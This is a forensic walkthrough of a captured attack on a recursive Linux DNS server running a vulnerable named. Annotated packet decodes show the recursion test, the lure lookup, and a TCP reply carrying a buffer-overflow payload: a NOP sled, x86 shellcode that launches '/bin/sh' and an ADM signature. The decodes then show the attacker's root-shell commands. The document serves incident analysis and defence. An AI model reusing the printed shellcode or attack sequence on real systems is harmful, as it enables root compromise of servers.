--- COMMENT: The Tickle ---

What you are looking at below are the decoded packets of the exploit.  For this particular DNS exploit to work, the DNS victim must be recursive (as I soon learned).  So, our black-hat has to determine that our victim DNS server is recursive.  He first tests this by querying the DNS server to resolve 107.71.80.216.in-addr.arpa.  If successful, he will then know our DNS server is recursive. Below you see the packets of the successfull, recursive lookup of 107.71.80.216.in-addr.arpa.

04/26-06:42:59.473423 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18856
Len: 52
95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .j...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa.....

04/26-06:42:59.474405 172.16.1.107:1028 -> 128.8.10.90:53
UDP TTL:64 TOS:0x0 ID:18861
Len: 52
5C 21 01 00 00 01 00 00 00 00 00 00 03 31 30 37  \!...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa.....

04/26-06:42:59.574808 128.8.10.90:53 -> 172.16.1.107:1028
UDP TTL:48 TOS:0x0 ID:5077
Len: 135
5C 21 81 00 00 01 00 00 00 02 00 00 03 31 30 37  \!...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01 02 37 31 02  dr.arpa......71.
38 30 03 32 31 36 07 49 4E 2D 41 44 44 52 04 61  80.216.IN-ADDR.a
72 70 61 00 00 02 00 01 00 07 E9 00 00 12 03 4E  rpa............N
53 30 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00  S0.ENTERACT.COM.
C0 2C 00 02 00 01 00 07 E9 00 00 13 07 42 49 46  .,...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D C0 5B     ROST.SEASTROM.[

04/26-06:42:59.576169 172.16.1.107:1028 -> 198.32.64.12:53
UDP TTL:64 TOS:0x0 ID:18862
Len: 46
87 2A 00 00 00 01 00 00 00 00 00 00 07 42 49 46  .*...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO
4D 00 00 01 00 01                                M.....

04/26-06:42:59.576953 172.16.1.107:1028 -> 198.32.64.12:53
UDP TTL:64 TOS:0x0 ID:18863
Len: 42
DA 57 00 00 00 01 00 00 00 00 00 00 03 4E 53 30  .W...........NS0
08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM...
00 01                                            ..

04/26-06:43:00.215765 198.32.64.12:53 -> 172.16.1.107:1028
UDP TTL:51 TOS:0x0 ID:42900
Len: 462
87 2A 80 00 00 01 00 00 00 0C 00 0C 07 42 49 46  .*...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO
4D 00 00 01 00 01 03 43 4F 4D 00 00 02 00 01 00  M......COM......
07 E9 00 00 14 01 41 0C 52 4F 4F 54 2D 53 45 52  ......A.ROOT-SER
56 45 52 53 03 4E 45 54 00 C0 26 00 02 00 01 00  VERS.NET..&.....
07 E9 00 00 04 01 47 C0 37 C0 26 00 02 00 01 00  ......G.7.&.....
07 E9 00 00 11 01 46 0C 47 54 4C 44 2D 53 45 52  ......F.GTLD-SER
56 45 52 53 C0 44 C0 26 00 02 00 01 00 07 E9 00  VERS.D.&........
00 04 01 46 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...F.7.&........
00 04 01 49 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...I.7.&........
00 04 01 45 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...E.7.&........
00 04 01 4A C0 67 C0 26 00 02 00 01 00 07 E9 00  ...J.g.&........
00 04 01 4B C0 67 C0 26 00 02 00 01 00 07 E9 00  ...K.g.&........
00 04 01 41 C0 67 C0 26 00 02 00 01 00 07 E9 00  ...A.g.&........
00 04 01 4D C0 67 C0 26 00 02 00 01 00 07 E9 00  ...M.g.&........
00 04 01 48 C0 67 C0 26 00 02 00 01 00 07 E9 00  ...H.g.&........
00 04 01 43 C0 67 C0 35 00 01 00 01 00 36 EE 80  ...C.g.5.....6..
00 04 C6 29 00 04 C0 55 00 01 00 01 00 36 EE 80  ...)...U.....6..
00 04 C0 70 24 04 C0 65 00 01 00 01 00 07 E9 00  ...p$..e........
00 04 C6 11 D0 43 C0 82 00 01 00 01 00 36 EE 80  .....C.......6..
00 04 C0 05 05 F1 C0 92 00 01 00 01 00 36 EE 80  .............6..
00 04 C0 24 94 11 C0 A2 00 01 00 01 00 36 EE 80  ...$.........6..
00 04 C0 CB E6 0A C0 B2 00 01 00 01 00 07 E9 00  ................
00 04 C6 29 00 15 C0 C2 00 01 00 01 00 07 E9 00  ...)............
00 04 C3 08 63 0B C0 D2 00 01 00 01 00 07 E9 00  ....c...........
00 04 C6 29 03 26 C0 E2 00 01 00 01 00 07 E9 00  ...).&..........
00 04 D2 B0 98 12 C0 F2 00 01 00 01 00 07 E9 00  ................
00 04 D8 21 4B 52 C1 02 00 01 00 01 00 07 E9 00  ...!KR..........
00 04 CD BC B9 12                                ......

04/26-06:43:00.218808 172.16.1.107:1028 -> 205.188.185.18:53
UDP TTL:64 TOS:0x0 ID:18864
Len: 46
E6 38 00 00 00 01 00 00 00 00 00 00 07 42 49 46  .8...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO
4D 00 00 01 00 01                                M.....

04/26-06:43:00.220217 198.32.64.12:53 -> 172.16.1.107:1028
UDP TTL:51 TOS:0x0 ID:42903
Len: 458
DA 57 80 00 00 01 00 00 00 0C 00 0C 03 4E 53 30  .W...........NS0
08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM...
00 01 03 43 4F 4D 00 00 02 00 01 00 07 E9 00 00  ...COM..........
14 01 41 0C 52 4F 4F 54 2D 53 45 52 56 45 52 53  ..A.ROOT-SERVERS
03 4E 45 54 00 C0 22 00 02 00 01 00 07 E9 00 00  .NET..".........
04 01 47 C0 33 C0 22 00 02 00 01 00 07 E9 00 00  ..G.3.".........
11 01 46 0C 47 54 4C 44 2D 53 45 52 56 45 52 53  ..F.GTLD-SERVERS
C0 40 C0 22 00 02 00 01 00 07 E9 00 00 04 01 46  .@."...........F
C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 49  .3."...........I
C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 45  .3."...........E
C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4A  .3."...........J
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4B  .c."...........K
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 41  .c."...........A
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4D  .c."...........M
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 48  .c."...........H
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 43  .c."...........C
C0 63 C0 31 00 01 00 01 00 36 EE 80 00 04 C6 29  .c.1.....6.....)
00 04 C0 51 00 01 00 01 00 36 EE 80 00 04 C0 70  ...Q.....6.....p
24 04 C0 61 00 01 00 01 00 07 E9 00 00 04 C6 11  $..a............
D0 43 C0 7E 00 01 00 01 00 36 EE 80 00 04 C0 05  .C.~.....6......
05 F1 C0 8E 00 01 00 01 00 36 EE 80 00 04 C0 24  .........6.....$
94 11 C0 9E 00 01 00 01 00 36 EE 80 00 04 C0 CB  .........6......
E6 0A C0 AE 00 01 00 01 00 07 E9 00 00 04 C6 29  ...............)
00 15 C0 BE 00 01 00 01 00 07 E9 00 00 04 C3 08  ................
63 0B C0 CE 00 01 00 01 00 07 E9 00 00 04 C6 29  c..............)
03 26 C0 DE 00 01 00 01 00 07 E9 00 00 04 D2 B0  .&..............
98 12 C0 EE 00 01 00 01 00 07 E9 00 00 04 D8 21  ...............!
4B 52 C0 FE 00 01 00 01 00 07 E9 00 00 04 CD BC  KR..............
B9 12                                            ..

04/26-06:43:00.222098 172.16.1.107:1028 -> 205.188.185.18:53
UDP TTL:64 TOS:0x0 ID:18865
Len: 42
3D 9D 00 00 00 01 00 00 00 00 00 00 03 4E 53 30  =............NS0
08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM...
00 01                                            ..

04/26-06:43:00.315827 205.188.185.18:53 -> 172.16.1.107:1028
UDP TTL:240 TOS:0x0 ID:40907  DF
Len: 147
E6 38 80 00 00 01 00 01 00 02 00 02 07 42 49 46  .8...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO
4D 00 00 01 00 01 C0 0C 00 01 00 01 00 02 A3 00  M...............
00 04 C0 94 FC 0A 08 53 45 41 53 54 52 4F 4D 03  .......SEASTROM.
63 6F 6D 00 00 02 00 01 00 02 A3 00 00 02 C0 0C  com.............
C0 36 00 02 00 01 00 02 A3 00 00 0F 03 4E 53 30  .6...........NS0
08 45 4E 54 45 52 41 43 54 C0 3F C0 0C 00 01 00  .ENTERACT.?.....
01 00 02 A3 00 00 04 C0 94 FC 0A C0 5C 00 01 00  ............\...
01 00 02 A3 00 00 04 CF E5 8F 03                 ...........

04/26-06:43:00.317904 205.188.185.18:53 -> 172.16.1.107:1028
UDP TTL:240 TOS:0x0 ID:40908  DF
Len: 147
3D 9D 80 00 00 01 00 01 00 02 00 02 03 4E 53 30  =............NS0
08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM...
00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 CF E5  ................
8F 03 08 45 4E 54 45 52 41 43 54 03 63 6F 6D 00  ...ENTERACT.com.
00 02 00 01 00 02 A3 00 00 13 07 42 49 46 52 4F  ...........BIFRO
53 54 08 53 45 41 53 54 52 4F 4D C0 3B C0 32 00  ST.SEASTROM.;.2.
02 00 01 00 02 A3 00 00 02 C0 0C C0 4A 00 01 00  ............J...
01 00 02 A3 00 00 04 C0 94 FC 0A C0 0C 00 01 00  ................
01 00 02 A3 00 00 04 CF E5 8F 03                 ...........

04/26-06:43:04.462930 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18880
Len: 52
95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .j...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa.....

04/26-06:43:04.463599 172.16.1.107:1028 -> 192.148.252.10:53
UDP TTL:64 TOS:0x0 ID:18866
Len: 52
F1 8E 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .............107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa.....

04/26-06:43:04.559157 192.148.252.10:53 -> 172.16.1.107:1028
UDP TTL:54 TOS:0x0 ID:7629
Len: 196
F1 8E 85 80 00 01 00 01 00 02 00 02 03 31 30 37  .............107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C  dr.arpa.........
00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69  ....Q....11.lspi
74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74  tz.soho.enteract
03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07  .com..71.80.216.
49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00  IN-ADDR.ARPA....
01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00  ...Q....ns0.G.U.
02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73  .....Q....bifros
74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01  t.seastrom.P.w..
00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01  ................
00 01 00 00 0E 10 00 04 C0 94 FC 0A              ............

04/26-06:43:04.560130 172.16.1.107:53 -> 213.28.22.189:1045
UDP TTL:64 TOS:0x0 ID:18867
Len: 196
95 6A 85 80 00 01 00 01 00 02 00 02 03 31 30 37  .j...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C  dr.arpa.........
00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69  ....Q....11.lspi
74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74  tz.soho.enteract
03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07  .com..71.80.216.
49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00  IN-ADDR.ARPA....
01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00  ...Q....ns0.G.U.
02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73  .....Q....bifros
74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01  t.seastrom.P.w..
00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01  ................
00 01 00 00 0E 10 00 04 C0 94 FC 0A              ............

            ---- COMMENT: Tickle Worked ----

The recursvie lookup worked.  Not only is  our system running a vulnerable version of named, but it is recuresive.  The black-hat now queries our DNS server for the name r.rsavings.net.  This is extrmelly odd, why would a remote system query my DNS server for a different domain name?  As we will soon learn, this is how the exploit works.  Our DNS server is being suckered.  Read below as our DNS server recursively attempts to find the NS for savings.net so it can query the IP Address (A record) of r.rsavings.net.

04/26-06:43:04.883506 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18882
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:04.884189 172.16.1.107:1028 -> 198.41.0.21:53
UDP TTL:64 TOS:0x0 ID:18868
Len: 40
F7 F5 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:04.969435 198.41.0.21:53 -> 172.16.1.107:1028
UDP TTL:244 TOS:0x0 ID:56421  DF
Len: 202
F7 F5 81 00 00 01 00 00 00 04 00 04 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....
08 52 53 41 56 49 4E 47 53 03 4E 45 54 00 00 02  .RSAVINGS.NET...
00 01 00 02 A3 00 00 12 03 4E 53 33 08 4D 59 44  .........NS3.MYD
4F 4D 41 49 4E 03 43 4F 4D 00 C0 20 00 02 00 01  OMAIN.COM.. ....
00 02 A3 00 00 06 03 4E 53 34 C0 3C C0 20 00 02  .......NS4.<. ..
00 01 00 02 A3 00 00 06 03 57 57 57 C0 20 C0 20  .........WWW. .
00 02 00 01 00 02 A3 00 00 08 05 53 45 52 56 32  ...........SERV2
C0 20 C0 38 00 01 00 01 00 02 A3 00 00 04 D8 22  . .8..........."
59 03 C0 56 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..V..........."
59 04 C0 68 00 01 00 01 00 02 A3 00 00 04 3F E2  Y..h..........?.
51 0D C0 7A 00 01 00 01 00 02 A3 00 00 04 3F E2  Q..z..........?.
51 0C                                            Q.

04/26-06:43:04.970963 172.16.1.107:1028 -> 198.41.3.38:53
UDP TTL:64 TOS:0x0 ID:18869
Len: 42
C2 4E 00 00 00 01 00 00 00 00 00 00 03 4E 53 34  .N...........NS4
08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM...
00 01                                            ..

04/26-06:43:04.971751 172.16.1.107:1028 -> 198.41.3.38:53
UDP TTL:64 TOS:0x0 ID:18870
Len: 42
F2 0B 00 00 00 01 00 00 00 00 00 00 03 4E 53 33  .............NS3
08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM...
00 01                                            ..

04/26-06:43:04.972052 172.16.1.107:1028 -> 63.226.81.13:53
UDP TTL:64 TOS:0x0 ID:18871
Len: 40
0C BC 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:05.063551 198.41.3.38:53 -> 172.16.1.107:1028
UDP TTL:242 TOS:0x0 ID:42903  DF
Len: 202
C2 4E 80 00 00 01 00 01 00 04 00 04 03 4E 53 34  .N...........NS4
08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM...
00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  ..............."
59 04 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00  Y..MYDOMAIN.COM.
00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32  ...........NS1.2
C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32  .2...........NS2
C0 32 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E  .2.2...........N
53 33 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02  S3.2.2..........
C0 0C C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22  ...J..........."
59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..\..........."
59 02 C0 6E 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..n..........."
59 03 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y.............."
59 04                                            Y.

04/26-06:43:05.065790 198.41.3.38:53 -> 172.16.1.107:1028
UDP TTL:242 TOS:0x0 ID:42904  DF
Len: 202
F2 0B 80 00 00 01 00 01 00 04 00 04 03 4E 53 33  .............NS3
08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM...
00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  ..............."
59 03 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00  Y..MYDOMAIN.COM.
00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32  ...........NS1.2
C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32  .2...........NS2
C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02 C0 0C  .2.2............
C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 34  .2...........NS4
C0 32 C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22  .2.J..........."
59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..\..........."
59 02 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y.............."
59 03 C0 7C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..|..........."
59 04                                            Y.

            --- COMMENT:  Buffer Overflow!  ---

Our nameserver identifies the nameserver for rsavings.net, 63.226.81.13. Our simple UDP DNS request for r.rsavings.net should have resulted in a simple UDP reply containing an answer.  However, we get a TCP connection instead, which isused the buffer overflow attack.  The following packets are the actual buffer overflow attack. Notice the '/bin/sh' script ran at the end of the buffer overflow.  That is the whole purpose of the exploit.  NOTE:  Based on passive fingerprinting, another forensic tool, this system also appears to be Linux box.

04/26-06:43:05.096725 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:49 TOS:0x0 ID:26472  DF
**S***** Seq: 0x45B8E7   Ack: 0x0   Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 4037587 0 NOP WS: 0

04/26-06:43:05.097443 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18872  DF
**S***A* Seq: 0x3FA07873   Ack: 0x45B8E8   Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 144023498 4037587 NOP WS: 0

04/26-06:43:05.204503 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26473  DF
******A* Seq: 0x45B8E8   Ack: 0x3FA07874   Win: 0x7D78
TCP Options => NOP NOP TS: 4037599 144023498

04/26-06:43:05.205940 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26474  DF
*****PA* Seq: 0x45B8E8   Ack: 0x3FA07874   Win: 0x7D78
TCP Options => NOP NOP TS: 4037599 144023498
19 C8                                            ..

04/26-06:43:05.206168 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18873  DF
******A* Seq: 0x3FA07874   Ack: 0x45B8EA   Win: 0x7D78
TCP Options => NOP NOP TS: 144023509 4037599
 

04/26-06:43:05.244101 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26475  DF
*****PA* Seq: 0x45B8EA   Ack: 0x3FA07874   Win: 0x7D78
TCP Options => NOP NOP TS: 4037599 144023498
0C BC 84 00 00 01 00 01 00 00 00 01 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....
01 72 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00  .r.rsavings.net.
00 01 00 01 00 00 01 2C 00 04 01 02 03 04 01 72  .......,.......r
08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 00 1E  .rsavings.net...
00 01 00 00 01 2C 19 6B 00 06 61 64 6D 61 64 6D  .....,.k..admadm
00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................

    ... repeated noops (0x90) removed for brevity sake ---

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 AC  ................
01 00 00 5E 89 76 0C 8D 46 08 89 46 10 8D 46 2E  ...^.v..F..F..F.
89 46 14 56 EB 54 5E 89 F3 B9 00 00 00 00 BA 00  .F.V.T^.........
00 00 00 B8 05 00 00 00 CD 80 50 8D 5E 02 B9 FF  ..........P.^...
01 00 00 B8 27 00 00 00 CD 80 8D 5E 02 B8 3D 00  ....'......^..=.
00 00 CD 80 5B 53 B8 85 00 00 00 CD 80 5B B8 06  ....[S.......[..
00 00 00 CD 80 8D 5E 0B B8 0C 00 00 00 CD 80 89  ......^.........
F3 B8 3D 00 00 00 CD 80 EB 2C E8 A7 FF FF FF 2E  ..=......,......
00 41 44 4D 52 4F 43 4B 53 00 2E 2E 2F 2E 2E 2F  .ADMROCKS.../../
2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E  ../../../../../.
2E 2F 2E 2E 2F 00 5E B8 02 00 00 00 CD 80 89 C0  ./../.^.........
85 C0 0F 85 8E 00 00 00 89 F3 8D 4E 0C 8D 56 18  ...........N..V.
B8 0B 00 00 00 CD 80 B8 01 00 00 00 CD 80 E8 75  ...............u
00 00 00 10 00 00 00 00 00 00 00 74 68 69 73 69  ...........thisi
73 73 6F 6D 65 74 65 6D 70 73 70 61 63 65 66 6F  ssometempspacefo
72 74 68 65 73 6F 63 6B 69 6E 61 64 64 72 69 6E  rthesockinaddrin
79 65 61 68 79 65 61 68 69 6B 6E 6F 77 74 68 69  yeahyeahiknowthi
73 69 73 6C 61 6D 65 62 75 74 61 6E 79 77 61 79  sislamebutanyway
77 68 6F 63 61 72 65 73 68 6F 72 69 7A 6F 6E 67  whocareshorizong
6F 74 69 74 77 6F 72 6B 69 6E 67 73 6F 61 6C 6C  otitworkingsoall
69 73 63 6F 6F 6C EB 86 5E 56 8D 46 08 50 8B 46  iscool..^V.F.P.F
04 50 FF 46 04 89 E1 BB 07 00 00 00 B8 66 00 00  .P.F.........f..
00 CD 80 83 C4 0C 89 C0 85 C0 75 DA 66 83 7E 08  ..........u.f.~.
02 75 D3 8B 56 04 4A 52 89 D3 B9 00 00 00 00 B8  .u..V.JR........
3F 00 00 00 CD 80 5A 52 89 D3 B9 01 00 00 00 B8  ?.....ZR........
3F 00 00 00 CD 80 5A 52 89 D3 B9 02 00 00 00 B8  ?.....ZR........
3F 00 00 00 CD 80 EB 12 5E 46 46 46 46 46 C7 46  ?.......^FFFFF.F
10 00 00 00 00 E9 FE FE FF FF E8 E9 FF FF FF E8  ................
4F FE FF FF 2F 62 69 6E 2F 73 68 00 2D 63 00 FF  O.../bin/sh.-c..
FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00  ................
70 6C 61 67 75 65 7A 5B 41 44 4D 5D 31 30 2F 39  plaguez[ADM]10/9
39 2D 65 78 69 74 00 90 90 90 90 90 90 90 90 90  9-exit..........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00                          ........
.

            --- COMMENT:  The script ---

Now that the buffer overflow has been launched, we have a root shell.  Something must be done with that rootshell. Our black-hat runs the following commands with that shell.  He first confirms the system architecture (uname -a) and the shell uid (id).  He then inserts two accounts onto the system, twin and hantu.

04/26-06:43:05.483639 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18876  DF
******A* Seq: 0x3FA07874   Ack: 0x45D2B2   Win: 0x7C70
TCP Options => NOP NOP TS: 144023537 4037617

04/26-06:43:06.219868 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26480  DF
*****PA* Seq: 0x45D2B2   Ack: 0x3FA07874   Win: 0x7D78
TCP Options => NOP NOP TS: 4037700 144023537
63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20  cd /; uname -a;
70 77 64 3B 20 69 64 3B 0A                       pwd; id;.

04/26-06:43:06.233691 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18877  DF
******A* Seq: 0x3FA07874   Ack: 0x45D2CB   Win: 0x7C70
TCP Options => NOP NOP TS: 144023612 4037700

04/26-06:43:06.236460 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18878  DF
*****PA* Seq: 0x3FA07874   Ack: 0x45D2CB   Win: 0x7C70
TCP Options => NOP NOP TS: 144023612 4037700
4C 69 6E 75 78 20 61 70 6F 6C 6C 6F 2E 75 69 63  Linux apollo.uic
6D 62 61 2E 65 64 75 20 32 2E 32 2E 35 2D 31 35  mba.edu 2.2.5-15
20 23 31 20 4D 6F 6E 20 41 70 72 20 31 39 20 32   #1 Mon Apr 19 2
32 3A 32 31 3A 30 39 20 45 44 54 20 31 39 39 39  2:21:09 EDT 1999
20 69 35 38 36 20 75 6E 6B 6E 6F 77 6E 0A         i586 unknown.

04/26-06:43:06.346489 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26482  DF
******A* Seq: 0x45D2CB   Ack: 0x3FA078C2   Win: 0x7D78
TCP Options => NOP NOP TS: 4037713 144023612

04/26-06:43:06.346819 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18879  DF
*****PA* Seq: 0x3FA078C2   Ack: 0x45D2CB   Win: 0x7C70
TCP Options => NOP NOP TS: 144023623 4037713
2F 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69  /.uid=0(root) gi
64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73  d=0(root) groups
3D 30 28 72 6F 6F 74 29 2C 31 28 62 69 6E 29 2C  =0(root),1(bin),
32 28 64 61 65 6D 6F 6E 29 2C 33 28 73 79 73 29  2(daemon),3(sys)
2C 34 28 61 64 6D 29 2C 36 28 64 69 73 6B 29 2C  ,4(adm),6(disk),
31 30 28 77 68 65 65 6C 29 0A                    10(wheel).

04/26-06:43:06.486257 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26483  DF
******A* Seq: 0x45D2CB   Ack: 0x3FA0791C   Win: 0x7D78
TCP Options => NOP NOP TS: 4037727 144023623

04/26-06:43:09.880779 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18907
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:19.875096 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18941
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:39.856657 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:19019
Len: 40
